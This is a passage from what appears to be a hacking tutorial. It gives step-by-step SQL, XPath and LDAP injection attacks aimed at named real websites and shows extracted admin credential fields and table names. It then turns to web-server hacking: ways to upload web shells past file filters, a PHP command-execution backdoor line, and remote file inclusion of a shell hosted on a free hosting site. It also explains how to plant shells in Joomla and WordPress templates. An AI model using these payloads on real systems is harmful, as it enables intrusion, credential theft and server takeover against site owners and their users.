5. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 40
6. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 30
7. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 35
8. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 33
9. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 32
10. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 31
11. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
12. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
13. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
14. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31—
15. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
,30,31—
16. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2
9,30,31—
79. 17. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29,30,31—
18. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2
5,26,27,28,29,30,31—
19. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
25,26,27,28,29,30,31 from information_schema.tables where table_schema =
database()—
20. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24,25,26,27,28,29,30,31 from information_schema.columns where table_name =
0x6e675f61646d696e—
21. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select
1,2,group_concat(id,0x3a,loginid,0x3a,email,0x3a,password,0x3a,name,0x3a,type,0x3a),
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from
ng_admin—
22. http://www.naukriguru.com/admin/
23. http://www.naukriguru.com/admin/index.php#
24. http://www.naukriguru.com/admin/add_industry.php
80. Xpath Injection :
Step 1: Inject --> +and extractvalue(rand(),concat(0x0a,version()))--
Eg:
http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,vers
ion()))--
msg: Could not query:XPATH syntax error: ' 5.5.32-cll'
=====================================================================
Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database()
limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :RecipeIngredients'
---------------------------------------------------------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+
msg: Could not query:XPATH syntax error: ' :SS_categories'
---------------------------------------------------------------------------------------------------------------------
Respectively :~ For 2,3,4,5,6,7,8.....
msg : Could not query:XPATH syntax error: ' :SS_ordered_carts'
Could not query:XPATH syntax error: ' :SS_orders'
Could not query:XPATH syntax error: ' :SS_products'
Could not query:XPATH syntax error: ' :SS_products2'
Could not query:XPATH syntax error: ' :SS_special_offers'
Could not query:XPATH syntax error: ' :categories'
81. Could not query:XPATH syntax error: ' :details'
Could not query:XPATH syntax error: ' :productrange'
Could not query:XPATH syntax error: ' :recipes'
Could not query:XPATH syntax error: ' :visitors'
=====================================================================
Note : Convert table name to HEX [String to hex conversion]
Eg : details : 64657461696c73 or 0x64657461696c73
=====================================================================
Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,column_name) from information_schema.columns WHERE
table_name=0x64657461696c73 limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from
/*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit
0,1)))--+
msg: Could not query:XPATH syntax error: ' :cust_firstname'
---------------------------------------------------------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Respectively :~ For 2,3,4,5,6,7,8.....
msg: Could not query:XPATH syntax error: ' :cust_lastname'
msg: Could not query:XPATH syntax error: ' :cust_country'
msg: Could not query:XPATH syntax error: ' :cust_zip'
msg: Could not query:XPATH syntax error: ' :cust_state'
msg: Could not query:XPATH syntax error: ' :cust_city
msg: Could not query:XPATH syntax error: ' :cust_address'
=====================================================================
Note : In case I got :
82. Table -> users
Columns -> Password & Email
So,
=====================================================================
Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select
concat(email,0x3a,password) from users limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from
/*!users*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :email:password'
=====================================================================
=====================================================================
83. LDAP injections :
---[ 0x01: Introduction ]
The technique of LDAP (Lightweight Directory Access Protocol) is
a lightweight
protocol to access the directory service X.500. This protocol
works over TCP/IP.
The access protocol LDAP is used to query and modify objects
stored.
---[ 0x02: Filters LDAP ]
It is quite important to understand how does the LDAP filters
work.
FC 4515 (6/2006) (http://tools.ietf.org/html/rfc4515).
Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = | filterlist
Not = ! filter
Filterlist = 1*filter
Item = simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = "=" /"~="/ ">=" / "<="
Present = attr = *
Substring = attr "=" [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
Logical operators:
- AND "&"
- OR "|"
- NOT "!"
Relational operators:
<=, >=, =, ~=
The wildcard "*" It is used to replace characters.
Filter example:
(&(objectClass=user)(uid=*)): We return a list of all objects of
type user, no matter
84. which takes the value of the attribute "uid."
---[ 0x02: LDAP injection in Web Applications ]
The technique Ldap injection is very similar to SQL injection.
The attack technique is used to operate websites built LDAP
judgments directly from
data supplied by the user.
Vulnerable code with comments (by Sacha Faust):
+++++++++++++++++++++++++++++++++++++
line 0: <html>
line 1: <body>
line 2: <%@ Language=VBScript %>
line 3: <%
line 4: Dim userName
line 5: Dim filter
line 6: Dim ldapObj
line 7:
line 8: Const LDAP_SERVER = "ldap.example"
line 9:
line 10: userName = Request.QueryString("user")
line 11:
line 12: if( userName = "" ) then
line 13: Response.Write("<b>Invalid request. Please
specify a valid user name</b><br>")
line 14: Response.End()
line 15: end if
line 16:
line 17:
line 18: filter = "(uid=" + CStr(userName) + ")" '
searching for the user entry
line 19:
line 20:
line 21: 'Creating the LDAP object and setting the base dn
line 22: Set ldapObj =
Server.CreateObject("IPWorksASP.LDAP")
line 23: ldapObj.ServerName = LDAP_SERVER
line 24: ldapObj.DN = "ou=people,dc=spilab,dc=com"
line 25:
line 26: 'Setting the search filter
line 27: ldapObj.SearchFilter = filter
line 28:
line 29: ldapObj.Search
line 30:
85. line 31: 'Showing the user information
line 32: While ldapObj.NextResult = 1
line 33: Response.Write("<p>")
line 34:
line 35: Response.Write("<b><u>User information for : "
+ ldapObj.AttrValue(0) + "</u></b><br>")
line 36: For i = 0 To ldapObj.AttrCount -1
line 37: Response.Write("<b>" + ldapObj.AttrType(i)
+ "</b> : " + ldapObj.AttrValue(i) + "<br>" )
line 38: Next
line 39: Response.Write("</p>")
line 40: Wend
line 41: %>
line 42: </body>
line 43: </html>
+++++++++++++++++++++++++++++++++++++
In line 10 note userName variable is initialized with the value
the parameter user and then quickly validated to see if the
value is zero.
If the value is not zero, the variable userName is used to
initialize the
variable filter on line 18.
This new variable is used directly to build an LDAP search to be
used in
the call to SearchFilter on line 27
The attacker has full control over what will be consulted on the
LDAP server.
You will get the result of the consultation when the code
reaches of the line 32 to 40,
all results and its attributes are displayed to the user.
Example 1:
http://website/ldap.asp?user=*
In this example dispatched the character "*" parameter in the
"user" which ends
in the variable filter.
This judgment LDAP will show any object that has an attribute
uid.
We show all users and their information.
Example 2:
http://website/ldap.asp?user=ka0x)(|(homedirectory=*)
87. Part 2
Web server Hacking
Using above vulnerabilities various type of hacks that can be used to hack web
server.
Guide content:
Shell Uploading Guide
Shell uploading through php-my-admin
Shell Jumping
Symlink Bypass 2013 forLinux Servers
Hack Web-DAV & Deface
Root server without local root exploit
LINUX SERVER ROOTING Tutorial
Cpanel Cracking
Bypass 403 ForbiddenAndCant Read /Etc/Named.Config Error
Backdoor a WEB SERVERS WITH WEBACOO
Web Server Hacking through Command Injection
How To Hack Windows Servers Using Dubrute 2.2
Symlink Tutorial for beginners
MASS DEFACETUTORIAL
How to hack a websites using Symlink Bypassing
ATTACKING WEBSERVERS VIA .HTACCESS
How to Back-connect withnetcat
Hacking Cold FusionServers - Part I
Hacking Cold FusionServers - Part II
88. So let’s get started !
1. Shell Uploading Guide
Many newbie’s face problem while uploading shell on a site after getting admin access/ logging
in to that site. So, I am writing this in order to help them. Basically shell gives us remote access
to that server. Such shells are available in different language like php, asp/aspx, cgi etc. So, we
have to choose a shell that will work on the server according to the server script. If the server
supports php shell then we have to choose any of the php shell Otherwise asp & cgi. now, let’s
come to the Main point…. AFTER LOGGING IN TO THE SITE IF WE FOUND ANY
UPLOAD OPTION IN THE SITE , THEN WE CAN EASILY UPLOAD SHELL. But
sometimes we have to do some changes to upload a shell.
Way 1
AS THE SHELL IS IN PHP FORMAT, SOMETIMES SOME SITES DOES NOT ALLOW
UPLOADING SUCH SCRIPTS DIRECTLY WITH THE PHP EXTENTION. If so happens then
just rename the shell name. Add .gif/.jpg/.html/.doc etc. Example: suppose before renaming the
shell name was shell.php, then we will rename it as shell.php.jpg or anything else.
Way 2
Upload a simple uploader shell first that isn’t detected by Antivirus and firewalls. THEN
UPLOAD YOUR SHELL THROUGH YOUR OWN SHELL. YOU CAN DOWNLOAD A
UPLOADER SHELL FROM HERE .
89. WAY 3
FEW FIREWALL OF THE SERVER DETECTS THE SHELL SCRIPT BY CHECKING THE
headers & don’t allow us to upload a shell. so we can bypass it by using “GIF89A SHELL
SCRIPT BYPASS” Method. open your shell in notepad. add “GIF89a;” without quote before the
shell code starts. liKe below…
GIF89a;
Depending on what kind of file validation they are using this may fool the Server Into thinking
its a image since when it reads the file it finds the gif header and assuMes its safe since it’s a
iMage.
WAY 4
This method is more advanced. This only works for client side filters rather than server side.
download firebug for Firefox, then edit the html of the upload .
<form enctype="multipart/form-data" action="uploader.php" method="POST"> Upload
DRP File: <input name="Upload Saved Replay" type="file" accept="*.jpg"/><br /> <input
type="submit" value="Upload File" /> </form>
Change the filter accept. to *.* or just remove it completely , it will then let you upload any type
of file.
WAY 5
Download “LIVE HTTP HEADERS” addon first for your firefox browser
1. Rename your shell name to shell.php.jpg (or whatever that site supports. In my case, site
supports only jpg file. Thats why i renamed it to shell.php.jpg.)
2. Open Firefox & Start your Live HTTP Headers addon, after that upload your shell.
3. Then your Live HTTP Headers will look something similar to this
90. 4. Then click on the shell.php.jpg, after click on Reply button.
5. Then again a new window will open, in that window there will be two boxes, but we have to
work on second box.
6. In the second box, rename your shell.php.jpg to shell.php, then again click on Reply button
91. WAY 6
Find yourself a copy of edjpgcom.exe "edjpgcom is a free Windows application that allows you
to change (or add) a JPEG comment in a JPEG file." Usage: -- edjpgcom "filename.jpg" Now
add this to the jpg comment since you wont be able to drop a whole shell in there due to limits
etc.
"; system($_GET['cmd']); echo ?>
now rename your jpg to .php and upload.
WAY 7
Another way you can fool the web server into thinking your uploading a image instead of a php shell is to
get Firefox and install the “tamperdata” Add on then click start tamper and upload your php shell then
tamper the data and change the content-Type from 'application/octet-stream' to 'image/jpeg'. If u have any
problem to upload a shell using tamperdata, then just do a simple google search. So many video tutorials
on this is available in web. So I am not explaining this step by step.
92. WAY 8
All the above mention way works when we find an upload button on the site. but when there is no upload
button, it’s not easy to upload a shell there. we can try few things…… We have to find out if there is a
edit option of an existing php/asp/aspx page. If there is a edit option then open that page & delete whole
script. After that, open your shell in notepad. Copy the script, paste to that page. Finally, save it. Now that
link will be your shell. possibly we can find edit option in the following pages of a site……
Contact us.php/ Contact us.asp
Class.php/ Class.asp
About us.php/about us.asp
Terms.php/terms.asp
nb: in some news, vehicles shelling, cart etc sites, don’t have any option to upload a file after logging in
through admin panel. They only allow file upload after logging through cpanel.
WAY 9
SOME TIMES, IN SOME REMOTE FILE INCLUSION Vulnerable SITES, WE HAVE TO EXECUTE
A SHELL FROM ANOTHER HOSTINGSITE. METHOD……..
1) UPLOAD YOUR SHELL IN A FREE HOSTINGSITE LIKE www.my3gb.com www.3owl.com ,
www.ripway.com , , www.000webhost.com , etc.
2) Now suppose your shelled site link is www.example.my3gb.com/c99.txt & YOUR VULNERABLE
SITE IS www.site.com
3) Now we have to execute this following command to gain shell access to that site.
http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt
4) REPLACE THE SITE LINK IN THE COMMAND ACCORDINGTO YOUR SHELL &
VULERABLE SITE LINK.
SHELL UPLOADING IN joomla, wp, vb, smf, ipb, mybb SITES
IN THOSE ABOVE MENTIONED SITE WE CANT FIND DIRECT UPLOAD OPTION
GENERALLY. SO WE HAVE TO DO THEM IN OTHER WAYS.
1.Joomla Site:
After Login into adminpanel u will find Extensions on 5th No. expand this click on it > template Manager
> check on any template (like beez,ja_purity) Now click on Edit (right upper side) after this click on Edit
html now paste ur shell code and click save...done site.com/templates/template name/index.php like
site.com/templates/beez/index.php
2.Wordpress:
login into admin panel expand Appearance then click on editor > u will find style.css
now select 404.php on right side paste ur shell code and click edit file u can find
shell in site.com/wp-content/themes/theme name u edit/404.php